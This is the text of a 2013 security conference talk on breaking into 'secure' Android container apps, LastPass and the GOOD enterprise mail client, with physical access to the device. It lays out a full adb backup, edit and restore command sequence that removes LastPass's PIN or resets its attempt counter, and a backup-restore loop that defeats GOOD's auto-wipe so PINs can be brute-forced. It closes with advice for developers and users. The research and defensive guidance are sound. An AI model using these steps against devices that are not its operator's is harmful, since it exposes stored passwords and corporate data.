who knows nothing - deepsec · pdf filemobile fail ::: cracking open “secure”...


Chris John Riley | 26.11.2013 | 2 Mobile Fail ::: Cracking open “secure” Android Containers

@ChrisJohnRiley > whoami

IT Security Analyst / Security Consultant

Raiffeisen Informatik GmbH

R-IT CERT Team

Regular conference speaker

DEF CON | Bsides | Hashdays | SecZone…

blog http://blog.c22.cc

Abject Failure (See Life for reference)

THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING

SOCRATES: APOLOGY, 21D


Why

Scenario

How

Closer Look

Making it easy

Review


WHY ?

too much information


Containers

Multiple uses

Pa$$w0rd databases

Corporate mail containers

Secure notes / files

...


but…

The device is insecure

...or worse


BYOD *

* Bring Your Own Disease


Solution?

Move the security closer to the data!


but…

… I lost my phone!

314 mobile phones 'stolen in London every day'

offenders traced three or four times out of 10

Source: UK Metropolitan Police 01/2013

state of Device security


KEEP CALM

secure containers will save us


… or not

Scenario

• Given physical access to a device

• What security do “secure” containers provide

• temporary access (< 3 minutes)

• permanent access


but…


remember

secure containers will SAVE us

GOALS


TL;DR

pwn secure containers

NOT MY GOALS

bypass device PIN 1234

r00t the device

do anything resembling…

HOW?


keep it simple

Android Debug Bridge


ADB – Android Debug Bridge

• Requires USB Debugging Enabled

• Doesn't require ROOTed device

• Root grants further access / makes things trivial

http://developer.android.com/tools/help/adb.html

adb functions


ADB – Android Debug Bridge

• Allows application side-loading

• [un]install applications over adb

• Doesn’t require device to be active

• Can be PIN locked (for some functions)

• New security implemented in 4.3

http://developer.android.com/tools/help/adb.html


ADB – Android Debug Bridge

• adb backup

• Backup Android device over adb (ICS onwards)

• -system → system data

• -apk → application apk

• Can backup specific application data individually

adb backup com.android.app -f backup.ab

http://developer.android.com/tools/help/adb.html

ADB – Android Debug Bridge

• adb restore

• Restore Android backup over adb

• Restore specific application data individually

• with or without application (apk)

adb restore backup.ab

http://developer.android.com/tools/help/adb.html

ADB – Android Debug Bridge

• adb pull / push

• Copy data to / from device over adb

• Limited access for non-root users

• no access to application config without root

• Works on locked devices (PIN Protected)

adb pull /sdcard/secret.txt secret.txt

http://developer.android.com/tools/help/adb.html


ADB – Android Debug Bridge

• adb shell

• Shell access on device

• Send keys / taps

• Limited for non-root users

• Works on locked devices (PIN Protected)

http://developer.android.com/tools/help/adb.html

adb shell


Supporting Tools

• openssl

• w/ zlib support

• star

• tar tool w/ added functionality we need


Closer look

lastpass

• Personal solution (w/ enterprise option)

• Uses online sync

• Can be secured with a PIN

• Can wipe data after 5 false logons

• Restricts screenshots

https://lastpass.com/android


Can store lastpass.com password

• So users don't need to type it EVERY time

• Reduces security

• Makes it usable!

Why store the PW?


_mySecur3L@sTp@$$p@$$w0rd1sDAb0mb&&&:

Easy to remember

Impossible to type!

It's OK though

You can enable a PIN!


PIN Security

• Limited to 4 digits!

• “auto-Wipe” data

• after 5 false logons

PIN == SECURE!

AndroidManifest.xml

<application android:allowBackup="true">

Default: true

adb backup com.lastpass.lpandroid -f lp.ab

What good is an .ab file?


Android Backup (.ab)

• zlib compressed (kinda)

• skip header (24 bytes)

• pipe to openssl w/zlib support

dd if=dropbox.ab bs=24 skip=1 | openssl zlib -d > dropbox.tar
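
An added example (not from the talk and not the author's ab_unpacker.py) that reads the .ab header line by line instead of assuming 24 bytes, then reports which shared-preference files an unencrypted backup carries off the device. The package name and file contents are constructed sample data; `parse_ab_header`, `list_backup_entries` and `preference_files` are illustrative names.

```python
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP"


def parse_ab_header(blob):
    """Return (header, payload_offset) for an Android Backup blob."""
    lines, pos = [], 0
    # Four newline-terminated fields: magic, format version,
    # compression flag, encryption scheme.
    for _ in range(4):
        end = blob.index(b"\n", pos)
        lines.append(blob[pos:end])
        pos = end + 1
    if lines[0] != MAGIC:
        raise ValueError("not an Android Backup file")
    header = {
        "version": int(lines[1]),
        "compressed": lines[2] == b"1",
        "encryption": lines[3].decode("ascii"),
    }
    return header, pos


def list_backup_entries(blob):
    """List the file paths inside an unencrypted backup."""
    header, offset = parse_ab_header(blob)
    if header["encryption"] != "none":
        # Encrypted backups carry extra header lines and an encrypted payload.
        raise ValueError("encrypted backup: payload needs the backup password")
    payload = blob[offset:]
    if header["compressed"]:
        payload = zlib.decompress(payload)
    with tarfile.open(fileobj=io.BytesIO(payload)) as tar:
        return [m.name for m in tar.getmembers() if m.isfile()]


def preference_files(names):
    """Keep entries shaped like apps/<package>/sp/<file> (shared preferences)."""
    hits = []
    for name in names:
        parts = name.split("/")
        if len(parts) >= 4 and parts[0] == "apps" and parts[2] == "sp":
            hits.append(name)
    return hits


def build_sample_backup():
    """Constructed sample: one preference file for a made-up package."""
    data = b'<map><string name="reprompt_tries">0</string></map>'
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo("apps/com.example.app/sp/prefs.xml")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return MAGIC + b"\n1\n1\nnone\n" + zlib.compress(buf.getvalue())


if __name__ == "__main__":
    sample = build_sample_backup()
    print(parse_ab_header(sample))
    print(preference_files(list_backup_entries(sample)))
```

For a plain backup with a single-digit version the four header fields add up to exactly the 24 bytes the slide skips; any other header shifts the payload offset, which is why a fixed skip is only "kinda" right.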


LPandroid.xml

• lastpass.com username

• lastpass.com password (encoded)

• PIN (encoded)

• Settings

• ...

<string name="reprompt_tries">0</string>

That looks interesting!

THEORY

if reprompt_tries < 5:
    prompt_for_pin()
else:
    drop_the_DBass()


Theory

• reprompt_tries as iterator

• increases till it reaches 5

• Sounds reasonable

• edit the XML and restore it

• Let's set “reprompt_tries” to -9999 then ;)


Proposed Attack

• Backup app data

• Edit XML

• set “reprompt_tries” to -9999

• Repackage

• Restore


0 - adb backup com.lastpass.lpandroid -f lpass.ab

1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar

2 - tar -tf lpass.tar > lpass.list

3 - tar -xvf lpass.tar

4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml

5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/

6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab

7 - openssl zlib -in lpass_new.tar >> lpass_new.ab

8 - adb restore lpass_new.ab

Not the easiest process...


counter++


good news…

We get 10,000 tries


bad news…

We get 10,000 tries

Let’s make it easier


No PIN > PIN


<string name="passwordrepromptonactivate">0</string>

<string name="pincodeforreprompt"></string>

<string name="requirepin">0</string>


PROFIT!


Easier Attack

• Backup app data

• Edit XML

• remove PIN

• Repackage

• Restore

• WIN!

for points...

Persistence

• Backup LastPass from device A

• Edit backup to remove PIN

• Rebuild backup

• Restore backup to device B

• Close & restart to re-sync changes from device A

• Profit?

...but I RESET my password!


PROFIT ++


...


GOOD for enterprise


GOOD

• Enterprise email solution

• Email | Contacts | intranet Browser | …

• Secured with a PIN or password

• enterprise policy

• Wipes data/device after 10 false logons

https://www.good.com


Adv. security features

• Double encryption

• SSL Tunnel + Encrypted contents

• Full MDM solution

• Password Policies

• …

• r00t detection

• emulator detection

• advanced detection

https://www.good.com


Lost device (BYOD)

• Can an attacker prevent secure wipe

• Can an attacker access cached data


PROBLEM

unlike LastPass

preferences are encrypted


PROBLEM


…after 10 false logons auto-wipe


Disable PIN


auto-wipe counter


brute-force


but…

AndroidManifest.xml

<application android:allowBackup="true">


THEORY


Theory

• Auto-wipe counter

• Stored IN app data somewhere


THEORY


adb restore

overwrite auto-wipe counter

#facepalm


brute-force


Naïve Attack

• Backup app data

• until good.unlock?

• Try 9 PINS

• Restore app data


PROBLEM

Naïve Attack timing

• 4 digit PIN

• est. 4.5 hours*

• 6 digit PIN

• est. 18.5 days*

• 8 digit PIN

• est. 5 years*

* 18.75 ppm ~ 50% keyspace


Naïve Attack timing

• 4 lower alphanum

• est. 31 days*

• 6 lower alphanum

• est. 3 years*

• 8 lower alphanum

• est. 110 years*

* 18.75 ppm ~ 50% keyspace


Naïve Attack timing

• 4 mixed alphanum

• est. 1 year*

• 6 mixed alphanum

• est. 46.5 years*

• 8 mixed alphanum

• est. 2880 years*

* 18.75 ppm ~ 50% keyspace

Device

CONTAINER

#facepalm


Adv. Attack

• Automate PIN + restore

• adb shell input text

• adb shell input keyevent

• adb shell input tap


Minimize keyspace

• Password Rules

• No sequenced numbers (e.g. 4567)

• No duplicate numbers (e.g. 1111)

• Result

• Reduced keyspace


PROFIT!


Making it easy


methodology

• Common methodology

• Backup (adb)

• Extract

• Examine

• Edit

• Repack

• Restore (adb)

← here be dragons

← bypass all the things

remember this process?


0 - adb backup com.lastpass.lpandroid -f lpass.ab

1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar

2 - tar -tf lpass.tar > lpass.list

3 - tar -xvf lpass.tar

4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml

5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/

6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab

7 - openssl zlib -in lpass_new.tar >> lpass_new.ab

8 - adb restore lpass_new.ab

Say that 10 times fast!


automation


ab_unpacker.py

https://github.com/ChrisJohnRiley/Random_Code


ab_packer.py

https://github.com/ChrisJohnRiley/Random_Code

Makes 0wning things

200% quicker

1000% funner

REVIEW

“secure” containers != SECURE containers

Physical access


IT


Developers

android:allowBackup

http://developer.android.com/guide/topics/data/backup.html

Some devs GET it!


pref files


Securing Apps

• Preference files are NOT secret

• Encrypt preference data

• ONLY store encrypted passwords

• No XOR / base64 please

• Don’t TRUST the config

• HMAC | Sign | Encrypt
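
An added sketch of the "Don't TRUST the config" advice, not code from the talk or from either product: a MAC rejects an edited counter such as reprompt_tries, and a generation number rejects a restore of an older copy that still carries a valid MAC. It assumes the MAC key and the generation counter are held outside the backed-up app data (for example in a hardware-backed keystore); `SealedPrefs`, `TamperError` and `demo` are illustrative names.

```python
import hashlib
import hmac
import json
import os


class TamperError(Exception):
    """Raised when a preference record fails verification."""


class SealedPrefs:
    """Preference record with integrity and rollback checks."""

    def __init__(self, key):
        self._key = key        # assumption: never stored in the backed-up data
        self._generation = 0   # assumption: monotonic, stored alongside the key

    def _tag(self, body):
        return hmac.new(self._key, body.encode(), hashlib.sha256).hexdigest()

    def save(self, prefs):
        # Every write bumps the generation and binds it into the MACed body.
        self._generation += 1
        body = json.dumps({"gen": self._generation, "prefs": prefs},
                          sort_keys=True)
        return {"body": body, "tag": self._tag(body)}

    def load(self, record):
        # 1. Integrity: any edit to the body invalidates the tag.
        if not hmac.compare_digest(self._tag(record["body"]), record["tag"]):
            raise TamperError("MAC mismatch")
        data = json.loads(record["body"])
        # 2. Freshness: an old record is authentic but no longer current.
        if data["gen"] != self._generation:
            raise TamperError("stale generation")
        return data["prefs"]


def outcome(store, record):
    """Return 'accepted' or the reason the record was rejected."""
    try:
        store.load(record)
        return "accepted"
    except TamperError as exc:
        return str(exc)


def demo():
    store = SealedPrefs(os.urandom(32))  # constructed key for the example
    first = store.save({"reprompt_tries": 0, "requirepin": "1"})
    fresh = outcome(store, first)
    # The edit from the slides: rewrite the counter inside the stored file.
    edited = dict(first, body=first["body"].replace(
        '"reprompt_tries": 0', '"reprompt_tries": -9999'))
    # Four failed attempts later the app has written a newer record.
    latest = store.save({"reprompt_tries": 4, "requirepin": "1"})
    return {
        "fresh": fresh,
        "edited": outcome(store, edited),
        "rolled_back": outcome(store, first),  # restore of the old backup
        "latest": outcome(store, latest),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:12} {result}")
```

Without the generation check the rolled-back record would verify cleanly, so a MAC on its own does not stop a backup/restore loop from resetting a wipe counter.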

android backup


Securing Apps

• Disallow Android Backup

• if you don’t absolutely need it!

<application android:allowBackup="false">

extra security


Extra Security

• USB Debugging

• Disable app when activated

• Root makes these hacks easier still

• edit/read preference files on device itself

• ROOT detection is too basic

• easy to fool

end users


Users

• Encrypt your device

• Encrypts ADB backups

• Need to enter same passcode on backup screen

• Disable USB Debugging

• protects against adb pull/push attacks

• Don’t lose your phone ;)


Question time

Thank you for your attention!

Raiffeisen Informatik GmbH

Lilienbrunngasse 7-9

A-1020 Wien

T +43 1/99 3 99 - 0

F +43 1/99 3 99 - 1100


www.raiffeiseninformatik.at